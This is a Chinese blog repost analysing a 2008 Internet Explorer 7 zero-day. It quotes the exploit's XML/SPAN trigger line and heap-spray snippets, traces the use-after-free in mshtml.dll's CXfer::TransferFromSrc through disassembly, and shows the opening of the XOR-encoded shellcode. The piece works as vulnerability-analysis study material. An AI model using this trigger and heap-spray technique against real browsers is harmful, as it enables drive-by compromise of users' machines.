IE7 0day漏洞分析

最新推荐文章于 2024-07-22 15:13:59 发布
最新推荐文章于 2024-07-22 15:13:59 发布
阅读量1.1k 收藏
点赞数
文章标签: ie byte image javascript c 公告
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/3502279
版权
by vessial

2008.12.9看到knownsec的安全公告,发现IE7的0day,所以我也凑凑热闹
from http://hi.baidu.com/vessial

说实话,不怎么会javascript,所以分析也挺费劲的,
但是大体知道是个怎么回事触发这个漏洞的了

0day代码片断
if(wxp||w2k3)document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://rਊr.book.com src=http://www.google.com]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');

关键触发是由于这个Image SRC的字段的数据造成的
http://rਊr.book.com
mshtml.dll会对这个SRC作解析

r把十进制的114转成0x0072
ਊ把十进制的2570转成0x0a0a
刚好它们拼在一起就是一个可利用的堆地址
0x0a0a0072,通过heap spray,分配大量的内存
可使shellcode填充到这个地址空间去,所以我们可以修改这个值来构造我们
的地址,知道下面的
用意了吧,呵呵
var retVal=unescape("%u0a0a%u0a0a");
aaablk=(0x0a0a0a0a-0x100000)/heapBlockSize;

它是怎么进入到0x0a0a0072这个地址的了,由于
重用了一个释放了的对象的造成可以执行我们自已构造的数据,具体代码如下
mshtml.dll CXfer::TransferFromSrc(void)
.text:461E3D18 public: long __thiscall CXfer::TransferFromSrc(void) proc near
.text:461E3D18                                        ; CODE XREF: CXfer::ColumnsChanged(ulong,ulong * const)+33 p
.text:461E3D18                                        ; CDataBindingEvents::TransferFromSrc(CElement *,long)+24 p ...
.text:461E3D18
.text:461E3D18 pvarg          = VARIANTARG ptr -18h
.text:461E3D18 var_8          = dword ptr -8
.text:461E3D18 var_4          = dword ptr -4
.text:461E3D18
.text:461E3D18                mov    edi, edi
.text:461E3D1A                push    ebp
.text:461E3D1B                mov    ebp, esp
.text:461E3D1D                sub    esp, 18h
.text:461E3D20                push    ebx
.text:461E3D21                push    esi
.text:461E3D22                mov    esi, ecx
.text:461E3D24                xor    ebx, ebx
.text:461E3D26                test    byte ptr [esi+1Ch], 9
.text:461E3D2A                jnz    loc_461E3E2E

.text:461E3D30                mov    eax, [esi] //eax==0x0a0a0072
.text:461E3D32                cmp    eax, ebx
.text:461E3D34                jz      loc_461E3E29
.text:461E3D3A                cmp    [esi+4], ebx
.text:461E3D3D                jz      loc_461E3E29
.text:461E3D43                cmp    [esi+8], ebx
.text:461E3D46                jz      loc_461E3E29
.text:461E3D4C                mov    ecx, [eax] //可能是eax==0x0a0a0a0a
.text:461E3D4E                push    edi
.text:461E3D4F                push    eax
.text:461E3D50                call    dword ptr [ecx+84h] //call 0x0a0a0aae
.text:461E3D56                mov    eax, [esi+1Ch]
.text:461E3D59                mov    edi, eax
.text:461E3D5B                shr    edi, 1

call 0x0a0a0aae会执行如下指令,一直执行直到执行到shellcode处

0A2BF9B6    0A0A            or      cl, byte ptr [edx]
0A2BF9B8    0A0A            or      cl, byte ptr [edx]
0A2BF9BA    0A0A            or      cl, byte ptr [edx]
0A2BF9BC    0A0A            or      cl, byte ptr [edx]
0A2BF9BE    0A0A            or      cl, byte ptr [edx]
0A2BF9C0    0A0A            or      cl, byte ptr [edx]
0A2BF9C2    0A0A            or      cl, byte ptr [edx]
0A2BF9C4    0A0A            or      cl, byte ptr [edx]
0A2BF9C6    0A0A            or      cl, byte ptr [edx]
0A2BF9C8    0A0A            or      cl, byte ptr [edx]
0A2BF9CA    0A0A            or      cl, byte ptr [edx]
0A2BF9CC    0A0A            or      cl, byte ptr [edx]
0A2BF9CE    0A0A            or      cl, byte ptr [edx]
0A2BF9D0    0A0A            or      cl, byte ptr [edx]
0A2BF9D2    0A0A            or      cl, byte ptr [edx]
0A2BF9D4    0A0A            or      cl, byte ptr [edx]
0A2BF9D6    0A0A            or      cl, byte ptr [edx]
0A2BF9D8    0A0A            or      cl, byte ptr [edx]
0A2BF9DA    0A0A            or      cl, byte ptr [edx]
0A2BF9DC    0A0A            or      cl, byte ptr [edx]
0A2BF9DE    0A0A            or      cl, byte ptr [edx]
0A2BF9E0    0A0A            or      cl, byte ptr [edx]
0A2BF9E2    0A0A            or      cl, byte ptr [edx]
0A2BF9E4    0A0A            or      cl, byte ptr [edx]
0A2BF9E6    0A0A            or      cl, byte ptr [edx]
0A2BF9E8    0A0A            or      cl, byte ptr [edx]

0A2BF9EA    90              nop  //shellcode
0A2BF9EB    90              nop
0A2BF9EC    25 00750090    and    eax, 90007500
0A2BF9F1    90              nop
0A2BF9F2    90              nop
0A2BF9F3    90              nop
0A2BF9F4    D9E1            fabs
0A2BF9F6    D93424          fstenv (28-byte) ptr [esp]
0A2BF9F9    58              pop    eax
0A2BF9FA    58              pop    eax
0A2BF9FB    58              pop    eax
0A2BF9FC    58              pop    eax
0A2BF9FD    33DB            xor    ebx, ebx
0A2BF9FF    B3 1C          mov    bl, 1C
0A2BFA01    03C3            add    eax, ebx
0A2BFA03    31C9            xor    ecx, ecx
0A2BFA05    66:81E9 65FA    sub    cx, 0FA65
0A2BFA0A    8030 21        xor    byte ptr [eax], 21
0A2BFA0D    40              inc    eax
0A2BFA0E ^ E2 FA          loopd  short 0A2BFA0A
iiprogram
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
最新IE 0day漏洞Metasploit生成方法.txt
03-18
最新IE 0day漏洞Metasploit生成方法.txt
ie7 0day当中的shellcode的escape+xor21加密
09-06
在网络安全领域,0day漏洞指的是尚未被公开或未有补丁的安全漏洞,而"ie7 0day"指的是针对Internet Explorer 7浏览器的一个未公开的0day漏洞。在这个特定的案例中,攻击者利用了该漏洞来执行shellcode,这是一种在...
IE7 0day Exploit Analysis
Kendiv's Box
12-14 4796
The exploit for this vulnerability has two parts:A. JavaScript heap spray code and x86 ShellcodeB. A short of special XML/SPAN tag elementsThe first part of this exploit is a combination of
IE7 0day漏洞
李新阳
12-12 170
IE70day漏洞被微软证实,但安全补丁还没有发布。现在的建议是:不要使用IE7。 要 我说啊,不如直接删除了IE7算了,一了百了。
微软IE7 0day网马分析(图解)
12-11 1328
微软IE7 0day网马分析微软IE70day网页木马在javascript脚本中构造了一个恶意的xml串。xml串中存在一个格式异常标签且包含image标记的CDATA标记。因为CDATA标记的格式不正常,所以IE7解析xml时会继续解析CDATA标记中的image标记。这个image标记中的SRC也是经过构造的,它利用了IE7在解析URI时的一个漏洞。当IE7在解析imag
IE7 0Day 漏洞分析及防御原理(图)
clubsondy的专栏
12-18 789
 IE7 0Day 漏洞分析   自2008年12月10日曝出IE7 0DAY漏洞以来,网页挂马网站迅速增多,受影响用户人数已达百万,而且有继续增多的趋势,一些地下组织开始公然贩卖漏洞服务,对该漏洞微软至今还未公布相关补丁,据了解,微软IE 7 0day漏洞是一个基于IE7浏览器内核的漏洞,所有基于IE7内核的浏览器如傲游、腾讯TT都会成为攻击对象,而且一些内置了IE内核的杀毒软件、应用软件如Of
深入剖析最新IE0day漏洞
weixin_33935777的博客
05-22 212
在2018年4月下旬,我们使用沙箱发现了IE0day漏洞;自从在野外发现上一个样本(CVE-2016-0189)已经有两年多了。从许多方面来看,这个特别的漏洞及其后续的开发比较有趣。下一篇文章将分析最新的漏洞背后的核心原因,CVE-2018-8174。 寻找0day漏洞 我们从VirusTotal (VT)开始搜寻0day漏洞,有人在2018年4月18日...
IE7 0DAY漏洞所用shellcode的分析
lionzl的专栏
07-07 852
IE7 0DAY漏洞所用shellcode的分析 2008/12/14 22:29 | 鬼仔 | 技术文章 | 占个座先 标 题: 【原创】IE7 0DAY漏洞所用shellcode的分析 作 者:轩辕小聪 时 间: 2008-12-11,20:37 链 接: http://bbs.pediy.com/showthread.php?t=78502 作者主页: http
最新OFFICE 0day漏洞分析
weixin_30612769的博客
04-20 167
漏洞概述 fireeye最近公布了一个OFFICE 0day,在无需用户交互的情况下,打开word文档就可以通过hta脚本执行任意代码。经过研究发现,此漏洞的成因主要是word在处理内嵌OLE2LINK对象时,通过网络更新对象时没有正确处理的Content-Type所导致的一个逻辑漏洞漏洞利用方法 首先准备一台apache服务器,web根目录下保存一个1.rtf文件,内容如下: ...
最新IE7漏洞0day分析.php
12-12
最新IE7漏洞0day分析.php 最新IE7漏洞0day分析.php
逃逸IE浏览器沙箱-在野0Day漏洞利用复现
10-13
标题中的“逃逸IE浏览器沙箱-在野0Day漏洞利用复现”指的是针对Internet Explorer(IE)浏览器的安全研究,特别是关于如何利用未公开(0Day漏洞来突破浏览器的安全沙箱机制。沙箱是一种安全措施,它限制了恶意代码...
0day-Exp包
05-13
常见的浏览器如Chrome、Firefox、IE等都曾遭受过0day漏洞的威胁。 0day漏洞的出现对网络安全构成了巨大挑战,因为它们使得攻击者能够绕过现有的安全防护措施。对于企业或个人来说,预防0day攻击的最佳策略是保持...
Vue 3 和 SpringBoot 实现文件分片上传示例
exlink2012的专栏
07-22 258
实现分片上传,并使用Spring Boot在后端保存文件。前端将文件分片并逐个上传到后端,后端接收到所有分片后再进行合并,最终保存为一个完整文件。
VUE中的重点*
最新发布
qq_61132537的博客
07-22 641
实际上就是一个闭包,因为vue是单页面应用,是由很多组件构成,每一个组件中都有一个data, 所以通过闭包给每一个组件创建了一个私有的作用域,这样就不会相互影响。
jquery-选择器常见用法
随笔
07-18 208
jquery-选择器,对象下有多个子元素时如何选择
Vue3企业级项目开发实战课-笔记记录
tuku0801的专栏
07-20 938
实践 Vue 3 自研组件库开发、Node.js 服务端开发、Vue 3 结合 Node.js 的全栈项目开发以及全栈项目的单元测试等大厂常见的项目技术场景
vue3 vxe-grid修改currentPage,查询数据的时候,从第一页开始查询
jwbabc的专栏
07-18 241
vxe-grid查询数据的时候,从第一页开始查询,并且清空选中,清空复选框状态等,查询数据查询。
谷粒商城实战笔记-35-前端基础-ES6-模块化
epitomizelu的专栏
07-20 487
模块化就是把代码进行拆分,方便重复利用。类似 java 中的导包:要使用一个包,必须先导包。JS 中没有包的概念,JS中类似的概念是模块。export和import。export命令用于规定模块的对外接口。import命令用于导入其他模块提供的功能。
王清主编:Windows 0day漏洞分析全攻略
0day安全:软件漏洞分析技术(第2版)》由王清主编,是一部专为网络安全领域打造的权威指南。该书共分为五个篇章,共计33章,深入剖析Windows平台上的缓冲区溢出漏洞分析、检测和防护技术。第一篇作为基础教程,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值